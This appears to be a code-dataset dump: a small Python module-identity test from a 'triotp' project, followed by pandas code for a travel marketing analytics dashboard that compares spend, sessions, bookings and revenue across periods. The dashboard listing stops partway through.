| 30.815068 | 76 | 0.556568 | 531 | 4,499 | 4.472693 | 0.129944 | 0.075789 | 0.083368 | 0.042105 | 0.839158 | 0.798737 | 0.798737 | 0.798737 | 0.792 | 0.792 | 0 | 0.047415 | 0.324961 | 4,499 | 145 | 77 | 31.027586 | 0.734607 | 0 | 0 | 0.769912 | 0 | 0 | 0.0489 | 0 | 0 | 0 | 0 | 0 | 0.061947 | 1 | 0.044248 | false | 0 | 0.035398 | 0 | 0.088496 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a5624ffe0302df36c8bf9a06a49d13a237a5f471 | 134 | py | Python | tests/test_helpers/test_sample.py | linkdd/triotp | 7726438da36255c983d999490109f104655fb3fe | [
"MIT"
] | 4 | 2021-11-26T21:39:17.000Z | 2022-03-04T09:32:07.000Z | tests/test_helpers/test_sample.py | linkdd/triotp | 7726438da36255c983d999490109f104655fb3fe | [
"MIT"
] | 1 | 2021-11-30T20:28:10.000Z | 2021-12-01T01:03:28.000Z | tests/test_helpers/test_sample.py | linkdd/triotp | 7726438da36255c983d999490109f104655fb3fe | [
"MIT"
] | null | null | null | from . import sample
def test_current_module():
assert sample is sample.__module__
assert sample is not sample.get_module()
| 19.142857 | 44 | 0.753731 | 19 | 134 | 4.947368 | 0.578947 | 0.255319 | 0.382979 | 0.425532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186567 | 134 | 6 | 45 | 22.333333 | 0.862385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a58bcbbf0ad35b031c46f56376c4cd4d420593e5 | 54,722 | py | Python | components/functions.py | kbhartiya/Covid19-Tracker-DashApp | 2322dacd1bab0ee38ec4a0af7d0068a478ed9cf0 | [
"Apache-2.0"
] | 2 | 2020-04-16T17:03:45.000Z | 2020-09-29T21:38:23.000Z | components/functions.py | kbhartiya/Covid19-Tracker | 2322dacd1bab0ee38ec4a0af7d0068a478ed9cf0 | [
"Apache-2.0"
] | null | null | null | components/functions.py | kbhartiya/Covid19-Tracker | 2322dacd1bab0ee38ec4a0af7d0068a478ed9cf0 | [
"Apache-2.0"
] | null | null | null | '''
from datetime import datetime as dt
from datetime import date, timedelta
from datetime import datetime
import plotly.graph_objs as go
from plotly import tools
import numpy as np
import pandas as pd
pd.options.mode.chained_assignment = None
# Read in Travel Report Data
df = pd.read_csv('data/performance_analytics_cost_and_ga_metrics.csv')
df.rename(columns={
'Travel Product': 'Placement type',
'Spend - This Year': 'Spend TY',
'Spend - Last Year': 'Spend LY',
'Sessions - This Year': 'Sessions - TY',
'Sessions - Last Year': 'Sessions - LY',
'Bookings - This Year': 'Bookings - TY',
'Bookings - Last Year': 'Bookings - LY',
'Revenue - This Year': 'Revenue - TY',
'Revenue - Last Year': 'Revenue - LY',
}, inplace=True)
df['Date'] = pd.to_datetime(df['Date'])
current_year = df['Year'].max()
current_week = df[df['Year'] == current_year]['Week'].max()
now = datetime.now()
datestamp = now.strftime("%Y%m%d")
columns = ['Spend TY', 'Spend LY', 'Sessions - TY', 'Sessions - LY', 'Bookings - TY', 'Bookings - LY', 'Revenue - TY', 'Revenue - LY']
# Define Formatters
def formatter_currency(x):
return "${:,.0f}".format(x) if x >= 0 else "(${:,.0f})".format(abs(x))
def formatter_currency_with_cents(x):
return "${:,.2f}".format(x) if x >= 0 else "(${:,.2f})".format(abs(x))
def formatter_percent(x):
return "{:,.1f}%".format(x) if x >= 0 else "({:,.1f}%)".format(abs(x))
def formatter_percent_2_digits(x):
return "{:,.2f}%".format(x) if x >= 0 else "({:,.2f}%)".format(abs(x))
def formatter_number(x):
return "{:,.0f}".format(x) if x >= 0 else "({:,.0f})".format(abs(x))
# First Data Table Update Function
def update_first_datatable(start_date, end_date, category, aggregation):
if start_date is not None:
start_date = dt.strptime(start_date, '%Y-%m-%d')
start_date_string = start_date.strftime('%Y-%m-%d')
if end_date is not None:
end_date = dt.strptime(end_date, '%Y-%m-%d')
end_date_string = end_date.strftime('%Y-%m-%d')
days_selected = (end_date - start_date).days
prior_start_date = start_date - timedelta(days_selected + 1)
prior_start_date_string = datetime.strftime(prior_start_date, '%Y-%m-%d')
prior_end_date = end_date - timedelta(days_selected + 1)
prior_end_date_string = datetime.strftime(prior_end_date, '%Y-%m-%d')
if aggregation == 'Placement type':
df1 = df[(df['Category'] == category)].groupby(['Date', aggregation]).sum()[columns].reset_index()
df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
df_by_date_prior.rename(columns={'Spend TY' : 'Spend - LP', 'Sessions - TY' : 'Sessions - LP', 'Bookings - TY' : 'Bookings - LP','Revenue - TY' : 'Revenue - LP'}, inplace=True)
df_by_date_combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
elif aggregation == 'GA Category':
df1 = df.groupby(['Date', aggregation]).sum()[columns].reset_index()
df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
df_by_date_prior.rename(columns={'Spend TY' : 'Spend - LP', 'Sessions - TY' : 'Sessions - LP', 'Bookings - TY' : 'Bookings - LP','Revenue - TY' : 'Revenue - LP'}, inplace=True)
df_by_date_combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
df_by_date_combined.rename(columns={'GA Category':'Placement type'}, inplace=True)
elif aggregation == 'Birst Category':
df1 = df.groupby(['Date', aggregation]).sum()[columns].reset_index()
df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
df_by_date_prior.rename(columns={'Spend TY' : 'Spend - LP', 'Sessions - TY' : 'Sessions - LP', 'Bookings - TY' : 'Bookings - LP','Revenue - TY' : 'Revenue - LP'}, inplace=True)
df_by_date_combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
df_by_date_combined.rename(columns={'Birst Category':'Placement type'}, inplace=True)
# Calculate Differences on-the-fly
df_by_date_combined['Spend PoP (%)'] = np.nan
df_by_date_combined['Spend YoY (%)'] = np.nan
df_by_date_combined['Sessions PoP (%)'] = np.nan
df_by_date_combined['Sessions YoY (%)'] = np.nan
df_by_date_combined['Bookings PoP (%)'] = np.nan
df_by_date_combined['Bookings YoY (%)'] = np.nan
df_by_date_combined['Revenue PoP (%)'] = np.nan
df_by_date_combined['Revenue YoY (%)'] = np.nan
df_by_date_combined['Spend_PoP_abs_conditional'] = df_by_date_combined['Spend PoP (Abs)'] = ((df_by_date_combined['Spend TY'] - df_by_date_combined['Spend - LP']))
# Formatter
df_by_date_combined['Spend PoP (Abs)'] = df_by_date_combined['Spend PoP (Abs)'].apply(formatter_currency)
df_by_date_combined['Spend_PoP_percent_conditional'] = df_by_date_combined['Spend PoP (%)'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Spend - LP'] != 0),\
(((df_by_date_combined['Spend TY'] - df_by_date_combined['Spend - LP'])/df_by_date_combined['Spend - LP']) * 100), df_by_date_combined['Spend PoP (%)'])
# Formatter
df_by_date_combined['Spend PoP (%)'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Spend - LP'] != 0),\
df_by_date_combined['Spend PoP (%)'].apply(formatter_percent), df_by_date_combined['Spend PoP (%)'])
df_by_date_combined['Spend_YoY_percent_conditional'] = df_by_date_combined['Spend YoY (%)'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Spend LY'] != 0),\
((df_by_date_combined['Spend TY'] - df_by_date_combined['Spend LY'])/df_by_date_combined['Spend LY']) * 100, df_by_date_combined['Spend YoY (%)'])
# Formatter
df_by_date_combined['Spend YoY (%)'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Spend LY'] != 0),\
df_by_date_combined['Spend YoY (%)'].apply(formatter_percent), df_by_date_combined['Spend YoY (%)'])
df_by_date_combined['Sessions_PoP_percent_conditional'] = df_by_date_combined['Sessions PoP (%)'] = np.where((df_by_date_combined['Sessions - TY'] != 0) & (df_by_date_combined['Sessions - LP'] != 0),\
((df_by_date_combined['Sessions - TY'] - df_by_date_combined['Sessions - LP'])/df_by_date_combined['Sessions - LP']) * 100, df_by_date_combined['Sessions PoP (%)'])
# Formatter
df_by_date_combined['Sessions PoP (%)'] = np.where((df_by_date_combined['Sessions - TY'] != 0) & (df_by_date_combined['Sessions - LP'] != 0),\
df_by_date_combined['Sessions PoP (%)'].apply(formatter_percent), df_by_date_combined['Sessions PoP (%)'])
df_by_date_combined['Sessions_YoY_percent_conditional'] = df_by_date_combined['Sessions YoY (%)'] = np.where((df_by_date_combined['Sessions - TY'] != 0) & (df_by_date_combined['Sessions - LY'] != 0),\
((df_by_date_combined['Sessions - TY'] - df_by_date_combined['Sessions - LY'])/df_by_date_combined['Sessions - LY']) * 100, df_by_date_combined['Sessions YoY (%)'])
# Formatter
df_by_date_combined['Sessions YoY (%)'] = np.where((df_by_date_combined['Sessions - TY'] != 0) & (df_by_date_combined['Sessions - LY'] != 0),\
df_by_date_combined['Sessions YoY (%)'].apply(formatter_percent), df_by_date_combined['Sessions YoY (%)'])
df_by_date_combined['Bookings_PoP_abs_conditional'] = df_by_date_combined['Bookings PoP (Abs)'] = (df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LP'])
# Formatter
df_by_date_combined['Bookings PoP (Abs)'] = df_by_date_combined['Bookings PoP (Abs)'].apply(formatter_number)
df_by_date_combined['Bookings_YoY_abs_conditional'] = df_by_date_combined['Bookings YoY (Abs)'] = (df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LY'])
# Formatter
df_by_date_combined['Bookings YoY (Abs)'] = df_by_date_combined['Bookings YoY (Abs)'].apply(formatter_number)
df_by_date_combined['Bookings_PoP_percent_conditional'] = df_by_date_combined['Bookings PoP (%)'] = np.where((df_by_date_combined['Bookings - TY'] != 0) & (df_by_date_combined['Bookings - LP'] != 0),\
(df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LP'])/df_by_date_combined['Bookings - LP'] * 100, df_by_date_combined['Bookings PoP (%)'])
# Formatter
df_by_date_combined['Bookings PoP (%)'] = np.where((df_by_date_combined['Bookings - TY'] != 0) & (df_by_date_combined['Bookings - LP'] != 0),\
df_by_date_combined['Bookings PoP (%)'].apply(formatter_percent), df_by_date_combined['Bookings PoP (%)'])
df_by_date_combined['Bookings_YoY_percent_conditional'] = df_by_date_combined['Bookings YoY (%)'] = np.where((df_by_date_combined['Bookings - TY'] != 0) & (df_by_date_combined['Bookings - LY'] != 0),\
(df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LY'])/df_by_date_combined['Bookings - LY'] * 100, df_by_date_combined['Bookings YoY (%)'])
# Formatter
df_by_date_combined['Bookings YoY (%)'] = np.where((df_by_date_combined['Bookings - TY'] != 0) & (df_by_date_combined['Bookings - LY'] != 0),\
df_by_date_combined['Bookings YoY (%)'].apply(formatter_percent), df_by_date_combined['Bookings YoY (%)'])
df_by_date_combined['Revenue_PoP_abs_conditional'] = df_by_date_combined['Revenue PoP (Abs)'] = (df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LP'])
# Formatter
df_by_date_combined['Revenue PoP (Abs)'] = df_by_date_combined['Revenue PoP (Abs)'].apply(formatter_currency)
df_by_date_combined['Revenue_YoY_abs_conditional'] = df_by_date_combined['Revenue YoY (Abs)'] = (df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LY'])
# Formatter
df_by_date_combined['Revenue YoY (Abs)'] = df_by_date_combined['Revenue YoY (Abs)'].apply(formatter_currency)
df_by_date_combined['Revenue_PoP_percent_conditional'] = df_by_date_combined['Revenue PoP (%)'] = np.where((df_by_date_combined['Revenue - LP'] != 0) & (df_by_date_combined['Revenue - LP'] != 0),\
(df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LP'])/df_by_date_combined['Revenue - LP'] * 100, df_by_date_combined['Revenue PoP (%)'])
# Formatter
df_by_date_combined['Revenue PoP (%)'] = np.where((df_by_date_combined['Revenue - LP'] != 0) & (df_by_date_combined['Revenue - LP'] != 0),\
df_by_date_combined['Revenue PoP (%)'].apply(formatter_percent), df_by_date_combined['Revenue PoP (%)'])
df_by_date_combined['Revenue_YoY_percent_conditional'] = df_by_date_combined['Revenue YoY (%)'] = np.where((df_by_date_combined['Revenue - TY'] != 0) & (df_by_date_combined['Revenue - LY'] != 0),\
(df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LY'])/df_by_date_combined['Revenue - LY'] * 100, df_by_date_combined['Revenue YoY (%)'])
# Formatter
df_by_date_combined['Revenue YoY (%)'] = np.where((df_by_date_combined['Revenue - TY'] != 0) & (df_by_date_combined['Revenue - LY'] != 0),\
df_by_date_combined['Revenue YoY (%)'].apply(formatter_percent), df_by_date_combined['Revenue YoY (%)'])
# Format Numbers
df_by_date_combined['Spend TY'] = df_by_date_combined['Spend TY'].apply(formatter_currency)
df_by_date_combined['Spend - LP'] = df_by_date_combined['Spend - LP'].apply(formatter_currency)
df_by_date_combined['Spend LY'] = df_by_date_combined['Spend LY'].apply(formatter_currency)
df_by_date_combined['Sessions - TY'] = df_by_date_combined['Sessions - TY'].apply(formatter_number)
df_by_date_combined['Sessions - LP'] = df_by_date_combined['Sessions - LP'].apply(formatter_number)
df_by_date_combined['Sessions - LY'] = df_by_date_combined['Sessions - LY'].apply(formatter_number)
df_by_date_combined['Bookings - TY'] = df_by_date_combined['Bookings - TY'].apply(formatter_number)
df_by_date_combined['Bookings - LP'] = df_by_date_combined['Bookings - LP'].apply(formatter_number)
df_by_date_combined['Bookings - LY'] = df_by_date_combined['Bookings - LY'].apply(formatter_number)
df_by_date_combined['Revenue - TY'] = df_by_date_combined['Revenue - TY'].apply(formatter_currency)
df_by_date_combined['Revenue - LP'] = df_by_date_combined['Revenue - LP'].apply(formatter_currency)
df_by_date_combined['Revenue - LY'] = df_by_date_combined['Revenue - LY'].apply(formatter_currency)
# Rearrange the columns
df_by_date_combined_dt = df_by_date_combined[[
'Placement type',
'Spend TY', 'Spend - LP', 'Spend PoP (Abs)', 'Spend PoP (%)', 'Spend LY', 'Spend YoY (%)',
'Sessions - TY', 'Sessions - LP', 'Sessions PoP (%)', 'Sessions - LY', 'Sessions YoY (%)',
'Bookings - TY', 'Bookings - LP', 'Bookings PoP (%)', 'Bookings PoP (Abs)', 'Bookings - LY', 'Bookings YoY (%)', 'Bookings YoY (Abs)',
'Revenue - TY', 'Revenue - LP', 'Revenue PoP (Abs)', 'Revenue PoP (%)', 'Revenue - LY', 'Revenue YoY (%)', 'Revenue YoY (Abs)',
# 'Spend_PoP_percent_conditional',
]]
data_df = df_by_date_combined.to_dict("rows")
return data_df
# First Data Table Download Function
def update_first_download(start_date, end_date, category, aggregation):
if start_date is not None:
start_date = dt.strptime(start_date, '%Y-%m-%d')
start_date_string = start_date.strftime('%Y-%m-%d')
if end_date is not None:
end_date = dt.strptime(end_date, '%Y-%m-%d')
end_date_string = end_date.strftime('%Y-%m-%d')
days_selected = (end_date - start_date).days
prior_start_date = start_date - timedelta(days_selected + 1)
prior_start_date_string = datetime.strftime(prior_start_date, '%Y-%m-%d')
prior_end_date = end_date - timedelta(days_selected + 1)
prior_end_date_string = datetime.strftime(prior_end_date, '%Y-%m-%d')
if aggregation == 'Placement type':
df1 = df[(df['Category'] == category)].groupby(['Date', aggregation]).sum()[columns].reset_index()
df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
df_by_date_prior.rename(columns={'Spend TY' : 'Spend - LP', 'Sessions - TY' : 'Sessions - LP', 'Bookings - TY' : 'Bookings - LP','Revenue - TY' : 'Revenue - LP'}, inplace=True)
df_by_date_combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
elif aggregation == 'GA Category':
df1 = df.groupby(['Date', aggregation]).sum()[columns].reset_index()
df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
df_by_date_prior.rename(columns={'Spend TY' : 'Spend - LP', 'Sessions - TY' : 'Sessions - LP', 'Bookings - TY' : 'Bookings - LP','Revenue - TY' : 'Revenue - LP'}, inplace=True)
df_by_date_combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
df_by_date_combined.rename(columns={'GA Category':'Placement type'}, inplace=True)
elif aggregation == 'Birst Category':
df1 = df.groupby(['Date', aggregation]).sum()[columns].reset_index()
df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
df_by_date_prior.rename(columns={'Spend TY' : 'Spend - LP', 'Sessions - TY' : 'Sessions - LP', 'Bookings - TY' : 'Bookings - LP','Revenue - TY' : 'Revenue - LP'}, inplace=True)
df_by_date_combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
df_by_date_combined.rename(columns={'Birst Category':'Placement type'}, inplace=True)
# Calculate Differences on-the-fly
df_by_date_combined['Spend PoP (%)'] = np.nan
df_by_date_combined['Spend YoY (%)'] = np.nan
df_by_date_combined['Sessions PoP (%)'] = np.nan
df_by_date_combined['Sessions YoY (%)'] = np.nan
df_by_date_combined['Bookings PoP (%)'] = np.nan
df_by_date_combined['Bookings YoY (%)'] = np.nan
df_by_date_combined['Revenue PoP (%)'] = np.nan
df_by_date_combined['Revenue YoY (%)'] = np.nan
df_by_date_combined['Spend PoP (Abs)'] = ((df_by_date_combined['Spend TY'] - df_by_date_combined['Spend - LP']))
df_by_date_combined['Spend PoP (%)'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Spend - LP'] != 0),\
(((df_by_date_combined['Spend TY'] - df_by_date_combined['Spend - LP'])/df_by_date_combined['Spend - LP']) * 100), df_by_date_combined['Spend PoP (%)'])
df_by_date_combined['Spend YoY (%)'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Spend LY'] != 0),\
((df_by_date_combined['Spend TY'] - df_by_date_combined['Spend LY'])/df_by_date_combined['Spend LY']) * 100, df_by_date_combined['Spend YoY (%)'])
df_by_date_combined['Sessions PoP (%)'] = np.where((df_by_date_combined['Sessions - TY'] != 0) & (df_by_date_combined['Sessions - LP'] != 0),\
((df_by_date_combined['Sessions - TY'] - df_by_date_combined['Sessions - LP'])/df_by_date_combined['Sessions - LP']) * 100, df_by_date_combined['Sessions PoP (%)'])
df_by_date_combined['Sessions YoY (%)'] = np.where((df_by_date_combined['Sessions - TY'] != 0) & (df_by_date_combined['Sessions - LY'] != 0),\
((df_by_date_combined['Sessions - TY'] - df_by_date_combined['Sessions - LY'])/df_by_date_combined['Sessions - LY']) * 100, df_by_date_combined['Sessions YoY (%)'])
df_by_date_combined['Bookings PoP (Abs)'] = (df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LP'])
df_by_date_combined['Bookings YoY (Abs)'] = (df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LY'])
df_by_date_combined['Bookings PoP (%)'] = np.where((df_by_date_combined['Bookings - TY'] != 0) & (df_by_date_combined['Bookings - LP'] != 0),\
(df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LP'])/df_by_date_combined['Bookings - LP'] * 100, df_by_date_combined['Bookings PoP (%)'])
df_by_date_combined['Bookings YoY (%)'] = np.where((df_by_date_combined['Bookings - TY'] != 0) & (df_by_date_combined['Bookings - LY'] != 0),\
(df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LY'])/df_by_date_combined['Bookings - LY'] * 100, df_by_date_combined['Bookings YoY (%)'])
df_by_date_combined['Revenue PoP (Abs)'] = (df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LP'])
df_by_date_combined['Revenue YoY (Abs)'] = (df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LY'])
df_by_date_combined['Revenue PoP (%)'] = np.where((df_by_date_combined['Revenue - LP'] != 0) & (df_by_date_combined['Revenue - LP'] != 0),\
(df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LP'])/df_by_date_combined['Revenue - LP'] * 100, df_by_date_combined['Revenue PoP (%)'])
df_by_date_combined['Revenue YoY (%)'] = np.where((df_by_date_combined['Revenue - TY'] != 0) & (df_by_date_combined['Revenue - LY'] != 0),\
(df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LY'])/df_by_date_combined['Revenue - LY'] * 100, df_by_date_combined['Revenue YoY (%)'])
# Calculate CPS, CR, CPA
df_by_date_combined['CPS - TY'] = np.nan
df_by_date_combined['CPS - LP'] = np.nan
df_by_date_combined['CPS - LY'] = np.nan
df_by_date_combined['CPS PoP (Abs)'] = np.nan
df_by_date_combined['CPS YoY (Abs)'] = np.nan
df_by_date_combined['CVR - TY'] = np.nan
df_by_date_combined['CVR - LP'] = np.nan
df_by_date_combined['CVR - LY'] = np.nan
df_by_date_combined['CVR PoP (Abs)'] = np.nan
df_by_date_combined['CVR YoY (Abs)'] = np.nan
df_by_date_combined['CPA - TY'] = np.nan
df_by_date_combined['CPA - LP'] = np.nan
df_by_date_combined['CPA - LY'] = np.nan
df_by_date_combined['CPA PoP (Abs)'] = np.nan
df_by_date_combined['CPA YoY (Abs)'] = np.nan
df_by_date_combined['CPS PoP (%)'] = np.nan
df_by_date_combined['CPS YoY (%)'] = np.nan
df_by_date_combined['CVR PoP (%)'] = np.nan
df_by_date_combined['CVR YoY (%)'] = np.nan
df_by_date_combined['CPA PoP (%)' ] = np.nan
df_by_date_combined['CPA YoY (%)'] = np.nan
df_by_date_combined['CPS - TY'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Sessions - TY'] != 0),\
(df_by_date_combined['Spend TY']/df_by_date_combined['Sessions - TY']), df_by_date_combined['CPS - TY'])
df_by_date_combined['CPS - LP'] = np.where((df_by_date_combined['Spend - LP'] != 0) & (df_by_date_combined['Sessions - LP'] != 0),\
(df_by_date_combined['Spend - LP']/df_by_date_combined['Sessions - LP']), df_by_date_combined['CPS - LP'])
df_by_date_combined['CPS PoP (Abs)'] = (df_by_date_combined['CPS - TY'] - df_by_date_combined['CPS - LP'])
df_by_date_combined['CPS PoP (%)'] = np.where((df_by_date_combined['CPS - TY'] != 0) & (df_by_date_combined['CPS - LP'] != 0),\
((df_by_date_combined['CPS - TY'] - df_by_date_combined['CPS - LP'])/df_by_date_combined['CPS - LP']), df_by_date_combined['CPS PoP (%)'])
df_by_date_combined['CPS - LY'] = np.where((df_by_date_combined['Spend LY'] != 0) & (df_by_date_combined['Sessions - LY'] != 0),\
(df_by_date_combined['Spend LY']/df_by_date_combined['Sessions - LY']), df_by_date_combined['CPS - LY'])
df_by_date_combined['CPS YoY (Abs)'] = (df_by_date_combined['CPS - TY'] - df_by_date_combined['CPS - LY'])
df_by_date_combined['CPS YoY (%)'] = np.where((df_by_date_combined['CPS - TY'] != 0) & (df_by_date_combined['CPS - LY'] != 0),\
((df_by_date_combined['CPS - TY'] - df_by_date_combined['CPS - LY'])/df_by_date_combined['CPS - LY']), df_by_date_combined['CPS YoY (%)'] )
df_by_date_combined['CVR - TY'] = np.where(((df_by_date_combined['Bookings - TY'] != 0) & (df_by_date_combined['Sessions - TY'] != 0)), \
(df_by_date_combined['Bookings - TY']/df_by_date_combined['Sessions - TY'] * 100), df_by_date_combined['CVR - TY'])
df_by_date_combined['CVR - LP'] = np.where(((df_by_date_combined['Bookings - LP'] != 0) & (df_by_date_combined['Sessions - LP'] != 0)), \
(df_by_date_combined['Bookings - LP']/df_by_date_combined['Sessions - LP'] * 100), df_by_date_combined['CVR - LP'])
df_by_date_combined['CVR PoP (Abs)'] = np.where((df_by_date_combined['CVR - TY'].notnull() & df_by_date_combined['CVR - LP'].notnull()), \
((df_by_date_combined['CVR - TY'] - df_by_date_combined['CVR - LP'])), df_by_date_combined['CVR PoP (Abs)'])
df_by_date_combined['CVR PoP (%)'] = np.where(((df_by_date_combined['CVR - TY'] != 0) & (df_by_date_combined['CVR - LP'] != 0)), \
((df_by_date_combined['CVR - TY'] - df_by_date_combined['CVR - LP'])/df_by_date_combined['CVR - LP']), df_by_date_combined['CVR PoP (%)'])
df_by_date_combined['CVR - LY'] = np.where(((df_by_date_combined['Bookings - LY'] != 0) & (df_by_date_combined['Sessions - LY'] != 0)), \
(df_by_date_combined['Bookings - LY']/df_by_date_combined['Sessions - LY'] * 100), df_by_date_combined['CVR - LY'])
df_by_date_combined['CVR YoY (Abs)'] = np.where((df_by_date_combined['CVR - TY'].notnull() & df_by_date_combined['CVR - LY'].notnull()), \
((df_by_date_combined['CVR - TY'] - df_by_date_combined['CVR - LY'])), df_by_date_combined['CVR YoY (Abs)'])
df_by_date_combined['CVR YoY (%)'] = np.where(((df_by_date_combined['CVR - TY'] != 0) & (df_by_date_combined['CVR - LY'] != 0)), \
((df_by_date_combined['CVR - TY'] - df_by_date_combined['CVR - LY'])/df_by_date_combined['CVR - LY']), df_by_date_combined['CVR YoY (%)'])
df_by_date_combined['CPA - TY'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Bookings - TY'] != 0), \
(df_by_date_combined['Spend TY']/df_by_date_combined['Bookings - TY']), df_by_date_combined['CPA - TY'])
df_by_date_combined['CPA - LP'] = np.where((df_by_date_combined['Spend - LP'] != 0) & (df_by_date_combined['Bookings - LP'] != 0), \
(df_by_date_combined['Spend - LP']/df_by_date_combined['Bookings - LP']), df_by_date_combined['CPA - LP'])
df_by_date_combined['CPA PoP (Abs)'] = np.where((df_by_date_combined['CPA - TY'] != 0) & (df_by_date_combined['CPA - LP'] != 0), \
(df_by_date_combined['CPA - TY'] - df_by_date_combined['CPA - LP']), df_by_date_combined['CPA PoP (Abs)'])
df_by_date_combined['CPA PoP (%)' ] = np.where((df_by_date_combined['CPA - TY'] != 0) & (df_by_date_combined['CPA - LP'] != 0), \
((df_by_date_combined['CPA - TY'] - df_by_date_combined['CPA - LP'])/df_by_date_combined['CPA - LP']), df_by_date_combined['CPA PoP (%)' ] )
df_by_date_combined['CPA - LY'] = np.where((df_by_date_combined['Spend LY'] != 0) & (df_by_date_combined['Bookings - LY'] != 0), \
(df_by_date_combined['Spend LY']/df_by_date_combined['Bookings - LY']), df_by_date_combined['CPA - LY'])
df_by_date_combined['CPA YoY (Abs)'] = np.where((df_by_date_combined['CPA - TY'] != 0) & (df_by_date_combined['CPA - LY'] != 0), \
(df_by_date_combined['CPA - TY'] - df_by_date_combined['CPA - LY']), df_by_date_combined['CPA YoY (Abs)'])
df_by_date_combined['CPA YoY (%)'] = np.where((df_by_date_combined['CPA - TY'] != 0) & (df_by_date_combined['CPA - LY'] != 0), \
(df_by_date_combined['CPA - TY'] - df_by_date_combined['CPA - LY'])/df_by_date_combined['CPA - LY'], df_by_date_combined['CPA YoY (%)'])
df_by_date_combined['TY Start Date'] = start_date_string
df_by_date_combined['TY End Date'] = end_date_string
df_by_date_combined['LP Start Date'] = prior_start_date_string
df_by_date_combined['LP End Date'] = prior_end_date_string
last_years_start_date = start_date - timedelta(364)
last_years_start_date_string = datetime.strftime(last_years_start_date, '%Y-%m-%d')
last_years_end_date = end_date - timedelta(364)
last_years_end_date_string = datetime.strftime(last_years_end_date, '%Y-%m-%d')
df_by_date_combined['LY Start Date'] = last_years_start_date_string
df_by_date_combined['LY End Date'] = last_years_end_date_string
# Rearrange the columns
df_by_date_combined_dt = df_by_date_combined[[
'Placement type', 'TY Start Date', 'TY End Date', 'LP Start Date', 'LP End Date', 'LY Start Date', 'LY End Date',
